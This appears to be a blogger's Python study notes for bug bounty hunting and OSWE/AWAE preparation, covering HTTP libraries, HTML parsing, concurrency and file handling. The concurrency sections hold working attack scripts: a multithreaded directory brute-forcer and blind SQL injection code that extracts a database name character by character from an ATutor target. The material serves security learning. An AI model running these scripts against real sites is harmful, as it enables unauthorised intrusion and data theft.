Python for Bug Bounty Hunters & Web Hackers
Sharing my personal notes that I took and the resources that I refered while I was preparing AWAE and learning about Python.
Check out my original Github Repository here: Python for AWAE
Objective
Learn and understand Python well enough that we can use it to automate our bug bounty tasks or create quick exploits whenever required.
Where did I learn python?
- Python Tutorial for Beginners
- World's Best Python Tutorials (I think)
- Python OS Module
- Python Read and Write to files
- Python Requests Module
- Python re Module
- Python BeautifulSoup Module
- Python JSON Module
- Python Itertools Module
- Send Emails using python
- Python Requests-HTML Module
- Python Subprocess Module
- Python Threading Module
- Python Multiprocessing Module
- Python Zip Files Tutorial
Necessary Python Libraries
urllib2 (if python 2.x is in use)
Code to make a Simple GET Request using urllib2:
import urllib2
url = 'https://www.google.com/'
response = urllib2.urlopen(url) # GET
print(response.read())
response.close()
urllib (if python 3.x is in use)
Code to make a Simple GET Request using urllib:
import urllib.parse
import urllib.request
url = 'https://www.google.com/'
with urllib.request.urlopen(url) as response: # GET
content = response.read()
print(content)
Code to make a Simple POST Request using urllib:
info = {'user':'blackhat', 'passwd':'1337'}
data = urllib.parse.urlencode(info).encode() # data is now of type bytes
req = urllib.request.Request(url, data)
with urllib.request.urlopen(req) as response: # POST
content = response.read()
print(content)
Requests
- It's not a part of the standard library, hence the installation is required.
- Installation:
-
pip install requests
- Importing:
-
import requests
- Methods:
-
r = requests.get(url) r = requests.post(url, data={'key':'value'}) r = requests.put(url, data={'key':'value'}) r = requests.delete(url) r = requests.head(url) r = requests.options(url)
- Print Request URL:
-
print(r.url)
- Passing params in URLs via GET:
-
payload = {'key1': 'value1', 'key2': 'value2'} r = requests.get('https://httpbin.org/get', params=payload)
- Passing a list of items:
-
payload = {'key1': 'value1', 'key2': ['value2', 'value3']} r = requests.get('https://httpbin.org/get', params=payload) print(r.url)
- Get Response Content in binary form:
-
r.content
- Get Response Content in json form:
-
r.json
- Get raw response content:
-
r.raw.read(10)
- Add custom header:
-
url = 'https://api.github.com/some/endpoint' headers = {'user-agent': 'my-app/0.0.1'} r = requests.get(url, headers=headers)
- POST a multipart-encoded file:
-
url = 'https://httpbin.org/post' files = {'file': open('report.xls', 'rb')} r = requests.post(url, files=files) r.text
- Sending our own cookies:
-
cookies = dict(cookies_are='working') r = requests.get(url, cookies=cookies) r.text
- Others:
-
r.status_code # get status code r.headers # get response headers r.cookies # get cookies
lxml
and BeautifulSoup
packages
-
The
lxml
package provides a slightly faster parser, while theBeautifulSoup
package has logic to automatically detect the target HTML page's encoding. - Installation:
-
pip install lxml pip install BeautifulSoup
-
Suppose we are having the HTML content from a request stored in a variable named
content
. Usinglxml
, we could retrive thecontent
and parse the links as follows: -
from io import BytesIO from lxml import etree import requests url = 'https://www.example.com' r = requests.get(url) content = r.content # content is of type 'bytes' parser = etree.HTMLParser() content = etree.parse(BytesIO(content), parser=parser) # Parse into > tree for link in content.findall('//a'): # find all "a" anchor elements print(f"{link.get('href')} -> {link.text}")
Note: I tested this and I think it only works with python 3.6 or below
-
Same thing Using
BeautifulSoup
-
from bs4 import BeautifulSoup as bs import requests url = "https://www.google.com" r = requests.get(url) tree = bs(r.text, 'html.parser') # Parse into tree for link in tree.find_all('a'): # find all "a" anchor elements print(f"{link.get('href')} -> {link.text}")
Python Multi-threading
I personally think that multi-processing is better as compared to multi-threaded python scripts. It's good to learn unless and until you wanna just sit and see each request going one by one wasting your time.
We usually use python `queue` for multi-threading coz it's thread-safe and doesn't cause race condition.
- Here's a brute-forcing tool that'll help you understand multi-threading using queue.
-
import queue import threading import urllib.error import urllib.parse import urllib.request threads = 50 target_url = "http://testphp.vulnweb.com" wordlist_file = "all.txt" # from SVNDigger resume = None user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \ "Gecko/20100101 " \ "Firefox/19.0" def build_wordlist(wordlst_file): # read in the word list fd = open(wordlst_file, "r") raw_words = [line.rstrip('\n') for line in fd] fd.close() found_resume = False words = queue.Queue() for word in raw_words: if resume: if found_resume: words.put(word) else: if word == resume: found_resume = True print("Resuming wordlist from: %s" % resume) else: words.put(word) return words def dir_bruter(extensions=None): while not word_queue.empty(): attempt = word_queue.get() attempt_list = [] # check if there is a file extension if not # it's a directory path we're bruting if "." not in attempt: attempt_list.append("/%s/" % attempt) else: attempt_list.append("/%s" % attempt) # if we want to bruteforce extensions if extensions: for extension in extensions: attempt_list.append("/%s%s" % (attempt, extension)) # iterate over our list of attempts for brute in attempt_list: url = "%s%s" % (target_url, urllib.parse.quote(brute)) try: headers = {"User-Agent": user_agent} r = urllib.request.Request(url, headers=headers) response = urllib.request.urlopen(r) if len(response.read()): print("[%d] => %s" % (response.code, url)) except urllib.error.HTTPError as e: if e.code != 404: print("!!! %d => %s" % (e.code, url)) pass word_queue = build_wordlist(wordlist_file) file_extensions = [".php", ".bak", ".orig", ".inc"] for i in range(threads): t = threading.Thread(target=dir_bruter, args=(file_extensions,)) t.start()
Python Multi-Processing
Let's understand multi-processing using a script that'll help us retrieve database length using SQL
-
import multiprocessing as mp import requests target = "http://localhost/link/" def db_length(number): payload = f"te')/**/or/**/(length(database()))={number}#" param = {'q': payload} r = requests.get(target, param) content_length = int(r.headers['Content-length']) if content_length > 20: print(number) if __name__ == "__main__": print('[*] Retreiving Database Length: \n[*] Database length: ', end=' ') processes = [] for number in range(30): p = mp.Process(target=db_length, args=[number]) p.start() processes.append(p) for process in processes: process.join()
Python concurrent.futures
This one is the GOAT. Less code, more capability.
import requests
import concurrent.futures
target = "http://localhost/atutor/"
final_string = {}
def db_length(number):
payload = f"te')/**/or/**/(length(database()))={number}#"
param = {'q': payload}
r = requests.get(target, param)
content_length = int(r.headers['Content-length'])
if content_length > 20:
return number
def atutor_dbRetrieval(l):
for j in range(32, 256):
payload = f"te')/**/or/**/(select/**/"
payload += "ascii(substring(database(),{l},1))={j})#"
param = {'q': payload}
r = requests.get(target, param)
content_length = int(r.headers['Content-length'])
if content_length > 20:
final_string[l-1] = chr(j)
print(''.join(final_string[i] for i in sorted(final_string.keys())))
if __name__ == "__main__":
print('[*] Retreiving Database Length: \n[*] Database length: ', end=' ')
db_len = 0
with concurrent.futures.ProcessPoolExecutor() as executor:
results = [executor.submit(db_length, _) for _ in range(30)]
for f in concurrent.futures.as_completed(results):
if f.result() != None:
db_len = f.result()
print(db_len)
print("[+] Retrieving Database name: ....")
with concurrent.futures.ThreadPoolExecutor() as executor:
results = [executor.submit(atutor_dbRetrieval, index) for index in range(db_len+1)]
print("[+] Database Name: ", end=" ")
print(''.join(final_string[i] for i in sorted(final_string.keys())))
print("[+] Done")
Using python to navigate file system
OS Module
Note: Python OS Module can be used to navigate through the file system.
+ os.getcwd()
+ os.chdir()
+ os.listdir()
+ os.mkdir()
+ os.makedirs()
+ os.rmdir()
+ os.removedirs()
+ os.rename(, )
+ os.stat()
+ os.walk()
+ os.environ
+ os.path.join(, )
+ os.path.basename()
+ os.path.dirname()
+ os.path.exists()
+ os.path.splitext()
+ dir(os)
=> get curret working directory
=> change directory
=> list directory
=> create a directory
=> make directories recursively
=> remove directory
=> remove directory recursively
=> rename file
=> print all info of a file
=> traverse directory recursively
=> get environment variables
=> join path without worrying about /
=> get basename
=> get dirname
=> check if the path exists or not
=> split path and file extension
=> check what methods exists
Using python to read and write files
- Reading a file
-
with open('test.txt', 'r') as f: f_contents = f.read() print(f_contents)
- Get all lines into a list
-
with open('test.txt', 'r') as f: f_contents = f.readlines() print(f_contents)
- Read 1 line at a time
-
with open('test.txt', 'r') as f: f_contents = f.readline() print(f_contents)
- Reading file efficiently
-
with open('test.txt', 'r') as f: for line in f: print(line, end='')
- Going back to the start of the file
-
with open('test.txt', 'r') as f: for line in f: print(line, end='')
- Writing to a file
-
with open('test2.txt', 'w') as f: f.write('Test')
Note: `w` will overwrite the file, so use `a` if you wanna append
- Appending to a file
-
with open('test2.txt', 'a') as f: f.write('Test')
- Read and write to a file at the same time
-
with open('test.txt', 'r') as rf: with open('test_copy.txt', 'w') as wf: for line in rf: wf.write(line)
Conclusion
As per my experience, with this much knowledge of python - you can write almost all automation scripts you'll ever require while doing bug bounties and web hacking.